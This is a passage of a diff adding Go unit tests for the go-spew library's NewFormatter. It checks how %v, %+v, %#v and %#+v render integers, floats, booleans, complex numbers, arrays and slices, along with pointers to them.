+- %f passthrough with width and precision
+- %d passthrough with width
+- %q passthrough with string
+*/
+
+package spew_test
+
+import (
+ "bytes"
+ "fmt"
+ "testing"
+ "unsafe"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// formatterTest is used to describe a test to be performed against NewFormatter.
+type formatterTest struct {
+ format string
+ in interface{}
+ wants []string
+}
+
+// formatterTests houses all of the tests to be performed against NewFormatter.
+var formatterTests = make([]formatterTest, 0)
+
+// addFormatterTest is a helper method to append the passed input and desired
+// result to formatterTests.
+func addFormatterTest(format string, in interface{}, wants ...string) {
+ test := formatterTest{format, in, wants}
+ formatterTests = append(formatterTests, test)
+}
+
+func addIntFormatterTests() {
+ // Max int8.
+ v := int8(127)
+ nv := (*int8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int8"
+ vs := "127"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Max int16.
+ v2 := int16(32767)
+ nv2 := (*int16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "int16"
+ v2s := "32767"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Max int32.
+ v3 := int32(2147483647)
+ nv3 := (*int32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "int32"
+ v3s := "2147483647"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+
+ // Max int64.
+ v4 := int64(9223372036854775807)
+ nv4 := (*int64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "int64"
+ v4s := "9223372036854775807"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+
+ // Max int.
+ v5 := int(2147483647)
+ nv5 := (*int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "int"
+ v5s := "2147483647"
+ addFormatterTest("%v", v5, v5s)
+ addFormatterTest("%v", pv5, "<*>"+v5s)
+ addFormatterTest("%v", &pv5, "<**>"+v5s)
+ addFormatterTest("%v", nv5, "")
+ addFormatterTest("%+v", v5, v5s)
+ addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+ addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%+v", nv5, "")
+ addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+ addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+ addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", nv5, "(*"+v5t+")"+"")
+}
+
+func addUintFormatterTests() {
+ // Max uint8.
+ v := uint8(255)
+ nv := (*uint8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uint8"
+ vs := "255"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Max uint16.
+ v2 := uint16(65535)
+ nv2 := (*uint16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Max uint32.
+ v3 := uint32(4294967295)
+ nv3 := (*uint32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "uint32"
+ v3s := "4294967295"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+
+ // Max uint64.
+ v4 := uint64(18446744073709551615)
+ nv4 := (*uint64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "uint64"
+ v4s := "18446744073709551615"
+ addFormatterTest("%v", v4, v4s)
+ addFormatterTest("%v", pv4, "<*>"+v4s)
+ addFormatterTest("%v", &pv4, "<**>"+v4s)
+ addFormatterTest("%v", nv4, "")
+ addFormatterTest("%+v", v4, v4s)
+ addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+ addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%+v", nv4, "")
+ addFormatterTest("%#v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s)
+ addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s)
+ addFormatterTest("%#v", nv4, "(*"+v4t+")"+"")
+ addFormatterTest("%#+v", v4, "("+v4t+")"+v4s)
+ addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s)
+ addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"")
+
+ // Max uint.
+ v5 := uint(4294967295)
+ nv5 := (*uint)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "uint"
+ v5s := "4294967295"
+ addFormatterTest("%v", v5, v5s)
+ addFormatterTest("%v", pv5, "<*>"+v5s)
+ addFormatterTest("%v", &pv5, "<**>"+v5s)
+ addFormatterTest("%v", nv5, "")
+ addFormatterTest("%+v", v5, v5s)
+ addFormatterTest("%+v", pv5, "<*>("+v5Addr+")"+v5s)
+ addFormatterTest("%+v", &pv5, "<**>("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%+v", nv5, "")
+ addFormatterTest("%#v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#v", pv5, "(*"+v5t+")"+v5s)
+ addFormatterTest("%#v", &pv5, "(**"+v5t+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+ addFormatterTest("%#+v", v5, "("+v5t+")"+v5s)
+ addFormatterTest("%#+v", pv5, "(*"+v5t+")("+v5Addr+")"+v5s)
+ addFormatterTest("%#+v", &pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")"+v5s)
+ addFormatterTest("%#v", nv5, "(*"+v5t+")"+"")
+}
+
+func addBoolFormatterTests() {
+ // Boolean true.
+ v := bool(true)
+ nv := (*bool)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "bool"
+ vs := "true"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Boolean false.
+ v2 := bool(false)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "bool"
+ v2s := "false"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addFloatFormatterTests() {
+ // Standard float32.
+ v := float32(3.1415)
+ nv := (*float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "3.1415"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Standard float64.
+ v2 := float64(3.1415926)
+ nv2 := (*float64)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "float64"
+ v2s := "3.1415926"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+}
+
+func addComplexFormatterTests() {
+ // Standard complex64.
+ v := complex(float32(6), -2)
+ nv := (*complex64)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "complex64"
+ vs := "(6-2i)"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Standard complex128.
+ v2 := complex(float64(-6), 2)
+ nv2 := (*complex128)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "complex128"
+ v2s := "(-6+2i)"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+}
+
+func addArrayFormatterTests() {
+ // Array containing standard ints.
+ v := [3]int{1, 2, 3}
+ nv := (*[3]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "[3]int"
+ vs := "[1 2 3]"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Array containing type with custom formatter on pointer receiver only.
+ v2 := [3]pstringer{"1", "2", "3"}
+ nv2 := (*[3]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "[3]spew_test.pstringer"
+ v2sp := "[stringer 1 stringer 2 stringer 3]"
+ v2s := v2sp
+ if spew.UnsafeDisabled {
+ v2s = "[1 2 3]"
+ }
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2sp)
+ addFormatterTest("%v", &pv2, "<**>"+v2sp)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2sp)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2sp)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2sp)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2sp)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2sp)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2sp)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Array containing interfaces.
+ v3 := [3]interface{}{"one", int(2), uint(3)}
+ nv3 := (*[3]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[3]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3s := "[one 2 3]"
+ v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+ addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"")
+}
+
+func addSliceFormatterTests() {
+ // Slice containing standard float32 values.
+ v := []float32{3.14, 6.28, 12.56}
+ nv := (*[]float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "[]float32"
+ vs := "[3.14 6.28 12.56]"
+ addFormatterTest("%v", v, vs)
+ addFormatterTest("%v", pv, "<*>"+vs)
+ addFormatterTest("%v", &pv, "<**>"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%+v", v, vs)
+ addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+ addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%+v", nv, "")
+ addFormatterTest("%#v", v, "("+vt+")"+vs)
+ addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+ addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+ addFormatterTest("%#v", nv, "(*"+vt+")"+"")
+ addFormatterTest("%#+v", v, "("+vt+")"+vs)
+ addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+ addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+ addFormatterTest("%#+v", nv, "(*"+vt+")"+"")
+
+ // Slice containing type with custom formatter on pointer receiver only.
+ v2 := []pstringer{"1", "2", "3"}
+ nv2 := (*[]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "[]spew_test.pstringer"
+ v2s := "[stringer 1 stringer 2 stringer 3]"
+ addFormatterTest("%v", v2, v2s)
+ addFormatterTest("%v", pv2, "<*>"+v2s)
+ addFormatterTest("%v", &pv2, "<**>"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%+v", v2, v2s)
+ addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+ addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%+v", nv2, "")
+ addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+ addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+ addFormatterTest("%#v", nv2, "(*"+v2t+")"+"")
+ addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+ addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+ addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"")
+
+ // Slice containing interfaces.
+ v3 := []interface{}{"one", int(2), uint(3), nil}
+ nv3 := (*[]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3t5 := "interface {}"
+ v3s := "[one 2 3 ]"
+ v3s2 := "[(" + v3t2 + ")one (" + v3t3 + ")2 (" + v3t4 + ")3 (" + v3t5 +
+ ")]"
+ addFormatterTest("%v", v3, v3s)
+ addFormatterTest("%v", pv3, "<*>"+v3s)
+ addFormatterTest("%v", &pv3, "<**>"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%+v", v3, v3s)
+ addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+ addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+ addFormatterTest("%+v", nv3, "")
+ addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+ addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+ addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+ addFormatterTest("%#v", nv3, "(*"+v3t+")"+"")
+ addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
